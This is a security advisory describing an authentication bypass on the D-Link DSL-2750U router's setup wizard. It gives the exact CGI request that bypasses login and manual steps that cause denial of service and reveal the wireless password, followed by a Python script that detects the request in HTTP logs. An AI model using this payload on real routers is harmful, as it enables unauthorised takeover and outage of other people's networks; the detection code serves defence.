D-Link DSL-2750U Setup Wizard Page Authentication Bypass

2018-08-28 / 2018-09-17
Credit: Admin_JOKER
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage}
# Exploit Author: Admin_JOKER
# Email: Joker.Ktm314@gmail.com
# Date: 2018-08-23
# Category: Webapps
# Vendor Homepage: https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/
# Tested on: DSL-2750U
# Firmware Version: 1.11 / Works on all older firmware
# Video: https://youtu.be/BQQbp2vn_wY

URL: http://[Router IP]/
Example URL: http://192.168.1.1

Payload: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard
Example Payload: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard

+--------------------------------------------- Setup Wizard Pages ---------------------------------------------+
| Step 1: Set Time and Date           (Does not matter)                                                        |
| Step 2: Setup Internet Connection   (Give wrong information >> Denial of Service)                            |
| Step 3: Configure Wireless Network  (Change Type="password" to Type="text" in html code >> Information Leakage) |
| Step 4: Set Password                (Skip this step)                                                         |
| Step 5: Completed and Quit          (Finish)                                                                 |
+--------------------------------------------------------------------------------------------------------------+
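For detection, the request above can be matched in HTTP logs taken from a proxy or sensor placed in front of the router's management interface. The following is an added example, not part of the original advisory; the combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameter values copied from the advisory's request.
WIZARD_PARAMS = {"var:page": "wizard", "var:subpage": "wizentrance"}

# Assumption: combined-log-format lines ('IP - - [time] "METHOD URI PROTO" status size').
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation address range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Aug/2018:10:00:00 +0000] "GET /cgi-bin/webproc?getpage=html/index.html'
    '&var:menu=setup&var:subpage=wizentrance&var:page=wizard HTTP/1.1" 200 5120',
    '192.0.2.11 - - [28/Aug/2018:10:00:05 +0000] "GET /cgi-bin/webproc?getpage=html/index.html'
    '&var%3Amenu=setup&var%3Apage=WIZARD HTTP/1.1" 200 5120',
    '192.0.2.12 - - [28/Aug/2018:10:00:09 +0000] "GET /cgi-bin/webproc?getpage=html/index.html'
    ' HTTP/1.1" 200 2048',
    '192.0.2.13 - - [28/Aug/2018:10:00:12 +0000] "GET /favicon.ico HTTP/1.1" 404 0',
]


def is_wizard_request(uri):
    """True when the URI targets webproc and selects the setup wizard page."""
    parts = urlsplit(uri)
    if unquote(parts.path).rstrip("/").lower() != "/cgi-bin/webproc":
        return False
    seen = {}
    # parse_qs percent-decodes names and values, so var%3Apage is matched too.
    # Lower-casing is a conservative choice; the firmware's case handling is not known.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        seen.setdefault(name.lower(), set()).update(v.lower() for v in values)
    return any(want in seen.get(name, ()) for name, want in WIZARD_PARAMS.items())


def flag_log_lines(lines):
    """Return (client IP, status, URI) for every logged wizard-page request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_wizard_request(m["uri"]):
            hits.append((m["ip"], m["status"], m["uri"]))
    return hits


if __name__ == "__main__":
    for ip, status, uri in flag_log_lines(SAMPLE_LOG):
        print(f"{ip} status={status} {uri}")
```

A hit with status 200 from a client that never logged in to the management interface is the case worth alerting on; the log line alone does not show session state, so correlate with login events where they are available.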

References:

https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/

